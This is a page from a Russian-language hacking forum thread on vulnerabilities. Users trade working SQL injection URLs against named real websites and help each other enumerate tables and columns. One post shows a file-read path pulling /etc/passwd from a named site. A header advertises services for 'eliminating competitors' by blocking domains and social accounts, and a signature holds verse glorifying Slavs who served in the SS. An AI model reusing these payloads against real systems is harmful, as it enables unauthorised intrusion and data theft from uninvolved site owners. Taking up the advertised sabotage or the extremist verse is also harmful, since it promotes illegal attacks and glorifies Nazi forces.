УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 10 из 296

« Первая

110

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#91

18.05.2015, 22:40

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Цитата:

Сообщение от Br@!ns

Br@!ns said:
↑
Тут можно что нибудь сделать?

Код:

Code:
http://www.woodworkersworkshop.com/resources/index.php?search=asfasfasf

Код:

Code:
http://www.woodworkersworkshop.com/resources/index.php?search=%27)|updatexml(1,repeat(version(),2),1)%23

#92

20.05.2015, 13:16

truelamer

Участник форума

Регистрация: 06.11.2007

Сообщений: 143

Провел на форуме:
350782

Репутация: 81

Цитата:

Сообщение от Br@!ns

Br@!ns said:
↑
LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE test FIELDS TERMINATED BY '\n'
=> #1148 - The used command is not allowed with this MySQL version
версия судя по всему, не подходит

Другие команды чтения и записи выдают, что у пользователя не достаточно прав

#93

20.05.2015, 13:44

teh

Guest

Сообщений: n/a

Провел на форуме:
26437

Репутация: -2

Код:

Code:
http://www.svetodom.ru/brand/1%27%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%28Table_name%29%29%20from%20information_schema.tables%20limit%20100,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1--+/

до таблиц добрался, как дальше выбрать таблицу и узнать столбцы, и узнать информацию в столбцах?

#94

20.05.2015, 13:50

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Цитата:

Сообщение от teh

teh said:
↑

Код:

Code:
http://www.svetodom.ru/brand/1%27%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%28Table_name%29%29%20from%20information_schema.tables%20limit%20100,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1--+/

до таблиц добрался, как дальше выбрать таблицу и узнать столбцы, и узнать информацию в столбцах?

select column_name from information_schema.columns where table_name = TABLE

Код:

Code:
http://www.svetodom.ru/brand/1+and(extractvalue(1,concat(0x3a,(select(column_name)from+information_schema.columns+where+table_name=0x444f434c495354+limit+0,1))))=1/

#95

20.05.2015, 14:03

Br@!ns

Guest

Сообщений: n/a

Провел на форуме:
179197

Репутация: 25

Цитата:

Сообщение от truelamer

truelamer said:
↑
Другие команды чтения и записи выдают, что у пользователя не достаточно прав

Ну вообще вроди как права на чтения и ненужны, при той команде что я написал выше.

Код:

Code:
https://rdot.org/forum/showthread.php?t=741

#96

20.05.2015, 14:30

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

не думали, что mysql просто сконфигурирован корректно?

#97

20.05.2015, 15:07

huntercs16

Guest

Сообщений: n/a

Провел на форуме:
35200

Репутация: 6

http://sartraccc.ru/i.php?filename=1...oper=read_file

Ребятa, тут есть LFI

Можно как то достучаться до /etc/passwd и /etc/hosts, фильтруется как то непонятно

#98

20.05.2015, 17:28

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Цитата:

Сообщение от huntercs16

huntercs16 said:
↑
http://sartraccc.ru/i.php?filename=1...oper=read_file
Ребятa, тут есть LFI
Можно как то достучаться до /etc/passwd и /etc/hosts, фильтруется как то непонятно

там фильтр на etc. но в другом скрипте нет:

Код:

Code:
http://sartraccc.ru/print.php?print_file=/etc/passwd

#99

21.05.2015, 12:01

HAXTA4OK

Reservists Of Antichat - Level 6

Регистрация: 15.03.2009

Сообщений: 560

Провел на форуме:
4358210

Репутация: 2017

ЛОГИНЫ ПАРОЛИ В ОТКРЫТОМ ВИДЕ ЗДЕСЬ НЕ ПОСТИМ

__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.

#100

22.05.2015, 02:04

teh

Guest

Сообщений: n/a

Провел на форуме:
26437

Репутация: -2

Помогите с выводом

вроде все хорошо

Код:

Code:
http://helpmerchants.com/product_info.php?product_id=-425+union+select+1,table_name+from+information_schema.tables+limit+0,1--

но как хочу достать инфу, ничего не выводить

Код:

Code:
http://helpmerchants.com/product_info.php?product_id=-425+union+select+1,AddressInfoID+from+helpusr.addressinfo--

Страница 10 из 296

« Первая

110

Последняя »

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход